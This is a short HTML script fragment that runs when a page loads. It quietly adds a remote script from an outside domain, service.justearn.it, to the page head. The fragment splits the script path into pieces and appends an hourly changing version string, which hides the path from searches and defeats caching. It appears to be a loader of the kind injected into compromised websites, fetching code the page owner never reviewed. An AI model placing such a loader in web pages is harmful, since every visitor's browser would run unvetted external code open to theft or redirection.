
<script>
document.addEventListener("DOMContentLoaded", function() {
    var _l=document.createElement('script'),_d=new Date();_l.async=true;_l.src="https://service.justearn.it/scr"+"ipts/ma"+"in.js?ver=1.17."+_d.getDate()+'.'+_d.getHours();document.head.appendChild(_l);
}.bind(this) );
</script>
